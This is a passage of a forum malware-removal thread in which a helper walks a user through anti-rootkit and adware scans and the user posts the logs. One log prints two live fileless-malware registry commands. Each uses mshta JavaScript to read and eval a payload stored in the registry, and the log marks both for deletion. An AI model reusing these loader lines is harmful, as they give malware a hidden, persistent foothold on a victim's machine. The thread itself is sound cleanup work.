Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.


Systemfehler:
=============
Error: (08/06/2017 01:13:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/06/2017 01:11:46 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/06/2017 01:11:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/06/2017 01:08:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/06/2017 01:06:31 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/06/2017 01:06:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 13164 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 15354.91 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:70.63 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.44 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.95 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

07.08.2017, 10:47   #20
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™



Malwarebytes Anti-Rootkit (MBAR)

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Please run mbar.exe.
  • Follow the on-screen instructions as described in the guide to Malwarebytes Anti-Rootkit.
  • Be sure to update the database and allow the tool to scan your system.
  • Click the CleanUp button and allow the restart.
  • During the restart MBAR will remove the objects it found, so be patient.
  • After the restart, run mbar.exe again.
  • If anything is found again, repeat the CleanUp process.
The tool will create a log file ( mbar-log-<year-month-day>.txt ) in the folder it created. Please post it here.

Do not run any other file in this folder without instructions from a helper.



Reading material:
Posting in CODE tags
Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive first, makes my work much harder.
Even if the logs are too large for a single post, I ask you to post the logs directly, spread over several posts if necessary.
To put the log files in a CODE box, proceed as follows:
  • Select the entire log file (usually with CTRL+A) and copy it to the clipboard with CTRL+C.
  • In the editor, click the # symbol. Two bracketed tags appear: [CODE] [/CODE].
  • Place the cursor between the CODE tags and press CTRL+V.
  • Click Advanced/Preview to check whether you did it right. If everything is correct ... click Reply.

__________________
Please always post log files in CODE tags

07.08.2017, 18:57   #21
Lost_Viking



It didn't like something in the registry...
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.07.08
  rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
**** :: SILENTDRAGON [administrator]

07.08.2017 19:29:32
mbar-log-2017-08-07 (19-29-32).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 302574
Time elapsed: 10 minute(s), 8 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\QOFQOW\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5B53A\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Values Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\qofqow\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5b53a\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         
The second scan, with no findings:
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.07.08
  rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
***** :: SILENTDRAGON [administrator]

07.08.2017 19:45:23
mbar-log-2017-08-07 (19-45-23).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 301793
Time elapsed: 8 minute(s), 10 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         

07.08.2017, 21:41   #22
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™



Remove adware/junkware/toolbars

Delete old versions of adwCleaner and, if present, JRT beforehand, then download them fresh to the desktop!
Please disable your virus scanner completely now, before using these tools!




Step 1: adwCleaner v7.0.1.0

Please download AdwCleaner to your desktop (illustrated guide).
  • Close all open programs and browsers.
  • Start adwcleaner.exe with a double-click.
  • Accept the terms of use.
  • Click Tools > Options and make sure the following items are selected:
    • Tracing keys
    • Prefetch files
    • Proxy
    • Winsock
    • IE policies
    • Chrome policies
  • Confirm the selection with OK.
  • Click Scan and wait until it has finished. At the end of the scan a log file opens automatically. Close it.
  • Now click Clean (even if AdwCleaner says that nothing was found) and confirm any prompts with OK.
  • When the cleanup has finished, click Restart now. After the restart a text file opens. Post its contents in your next reply.
  • You can also find the log file at C:\AdwCleaner\AdwCleaner[Cx].txt (x = sequential number).



Step 2: JRT - Junkware Removal Tool

Please close your security software to avoid possible conflicts.
Please download Junkware Removal Tool to your desktop

  • Start the tool with a double-click. On Windows Vista (or later), please start it via right-click, "Run as administrator".
  • Press any key to start the tool.
  • Depending on the system, the scan can take a while.
  • When the tool has finished, the log file (JRT.txt) is saved to the desktop and opened automatically.
  • Please post the contents of JRT.txt in your next reply.

__________________
Please always post log files in CODE tags

07.08.2017, 23:00   #23
Lost_Viking

adwcleaner_7.0.1.0 SCAN



Code:
# AdwCleaner 7.0.1.0 - Logfile created on Mon Aug 07 21:51:40 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Local\YSearchUtil
Deleted: C:\ProgramData\IObit\ASCDownloader
Deleted: C:\Users\All Users\IObit\ASCDownloader
Deleted: C:\ProgramData\GPCWValidator
Deleted: C:\Users\All Users\GPCWValidator
Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
Deleted: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
Deleted: C:\ProgramData\{EAAB5A83-3809-4B0E-83A6-E4B0DBF2157E}
Deleted: C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}


***** [ Files ] *****

Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Users\All Users\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Windows\System32\lavasofttcpservice.dll
Deleted: C:\Windows\SysWOW64\lavasofttcpservice.dll
Deleted: C:\Windows\SysNative\LavasoftTcpService64.dll
Deleted: C:\Windows\Reimage.ini


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC
Deleted: [Key] - HKLM\SOFTWARE\ussc-pr
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted: [Value] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKLM\SOFTWARE\Reimage
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Reimage
Deleted: [Key] - HKCU\Software\Reimage
Deleted: [Key] - HKLM\SOFTWARE\Auslogics


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: MSN Homepage & Bing Search Engine - 


*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [7019 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [4242 B] - [2015/11/3 1:16:24]


########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########
         
Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by **** (Administrator) on 07.08.2017 at 23:57:46,77
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 10 

Successfully deleted: C:\ProgramData\pdfforge (Folder) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\Users\****\AppData\Roaming\productdata (Folder) 
Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (****) (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\StartMenu8_Start (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_Install_Martin_W (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Martin_W (Task)
Successfully deleted: C:\WINDOWS\Tasks\StartMenu8_Start.job (Task) 
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_W.job (Task) 
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_W.job (Task) 



Registry: 1 

Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 07.08.2017 at 23:58:47,94
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

07.08.2017, 23:09   #24
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™



Okay, please run both tools again as a check.

08.08.2017, 17:03   #25
Lost_Viking



OK, here is adwcleaner again
Code:
# AdwCleaner 7.0.1.0 - Logfile created on Tue Aug 08 15:59:40 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

No malicious folders deleted.

***** [ Files ] *****

No malicious files deleted.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

No malicious registry entries deleted.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [1456 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [1079 B] - [2015/11/3 1:16:24]


########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########
         
and JRT
Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:04:00,30
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 1 

Successfully deleted: C:\ProgramData\productdata (Folder) 



Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:05:00,48
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
and once more.....
Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:08:32,26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0 




Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:09:26,98
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

Last edited by Lost_Viking (08.08.2017 at 17:12)

08.08.2017, 22:02   #26
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™



I need new FRST logs. Tick the addition.txt box, then click Scan.


09.08.2017, 18:06   #27
Lost_Viking

FRST



Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017
durchgeführt von *** (Administrator) auf SILENTDRAGON (09-08-2017 18:59:08)
Gestartet von C:\Users\***\Desktop
Geladene Profile: *** (Verfügbare Profile: ***)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1986280 2017-07-07] (TomTom)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\***\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\***\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\***\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\***\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\***\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\***\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
